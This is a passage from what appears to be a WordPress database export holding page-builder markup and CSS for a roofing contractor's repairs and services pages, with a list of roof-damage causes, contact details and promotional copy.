skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"f3c8d953-d75e-4cd0-a016-ebca0253c0de\"} -->\n<style type=\"text/css\"> .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-f3c8d953-d75e-4cd0-a016-ebca0253c0de\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":471,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/4.jpg\" alt=\"\" class=\"wp-image-471\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"b2950aec-7a93-4bd2-bdf0-d978b7373e18\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-b2950aec-7a93-4bd2-bdf0-d978b7373e18\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":473,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/6.jpg\" alt=\"\" class=\"wp-image-473\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">COMMON ISSUES CAUSING ROOF DAMAGE.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li> Improper design/installation</li><li>Restrictive/absence of Ventilation</li><li>Fallen trees/branches Faulty Skylight </li><li>Premature ridge cap failure</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Call (248) 393-5000</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Fill out our contact form&nbsp;<a href=\"https://cteisys.com/contact-layout-1/\">here.</a>&nbsp;We will get back with you soon.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Repairs','','publish','closed','closed','','repairs','','','2022-08-24 17:04:00','2022-08-24 17:04:00','',160,'https://sktperfectdemo.com/themepack/gbrenovate/?page_id=269',0,'page','',0),(475,1,'2022-08-24 17:04:00','2022-08-24 17:04:00','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"60b023b9-e8c3-43e6-89ba-c3dfbd99479c\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"a687cc3b-6428-4919-81c1-fb1cd829e749\"} -->\n<style type=\"text/css\"> .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-a687cc3b-6428-4919-81c1-fb1cd829e749 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"8e161f0c-c998-4842-8873-8f192f3cb764\"} -->\n<style type=\"text/css\"> .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-8e161f0c-c998-4842-8873-8f192f3cb764\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"6a2bf94f-4d60-433a-b525-d53bf9619216\"} -->\n<style type=\"text/css\"> .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6a2bf94f-4d60-433a-b525-d53bf9619216\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"1a6b31cd-8a87-4edc-99f2-33dd2b097132\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-1a6b31cd-8a87-4edc-99f2-33dd2b097132\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Dunrite Roofing And Siding</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Dunrite Roofing has been serving the surrounding areas for over 30 years</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Bringing more than 30 years of experience to every job, Stork &amp; Sons Roof Maintenance provides reliable roofing in Bucks County and the surrounding Lehigh Valley areas. Our company is family owned and operated, and you can count on us for roofing, siding, and stucco services. We are passionate about the work that we do and pride ourselves on delivering high-quality work at fair, upfront, and honest pricing. We also specialize in siding and roofing repairs for those home that do not need a full replacement just yet. Our roofing experts work with all types of materials. including shingles, flat roofs, and siding. We do tear-offs and cleanups.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When you need fast, dependable results for your roof or siding, call Stork &amp; Sons Roof Maintenance today for a fast, fair, and free estimate!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"d5c61675-ddb2-4433-a568-128785b48d5b\"} -->\n<style type=\"text/css\"> .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d5c61675-ddb2-4433-a568-128785b48d5b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-d5c61675-ddb2-4433-a568-128785b48d5b skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"72780545-3bc2-4038-8814-1dd9138d037c\"} -->\n<style type=\"text/css\"> .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-72780545-3bc2-4038-8814-1dd9138d037c\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"084a0777-f0fe-40d8-8160-5e5511fafb42\"} -->\n<style type=\"text/css\"> .block-id-084a0777-f0fe-40d8-8160-5e5511fafb42 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-084a0777-f0fe-40d8-8160-5e5511fafb42 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-084a0777-f0fe-40d8-8160-5e5511fafb42 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-084a0777-f0fe-40d8-8160-5e5511fafb42 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/1.jpg\" alt=\"\" data-id=\"467\" data-link=\"https://cteisys.com/services/repairs/attachment/1/\" class=\"wp-image-467\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/2.jpg\" alt=\"\" data-id=\"468\" data-link=\"https://cteisys.com/services/repairs/attachment/2/\" class=\"wp-image-468\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/3.jpg\" alt=\"\" data-id=\"469\" data-link=\"https://cteisys.com/services/repairs/attachment/3/\" class=\"wp-image-469\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"bad42304-f956-4ff6-a71d-3d0927546977\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-desc-text {\n margin-bottom: 15px !important; 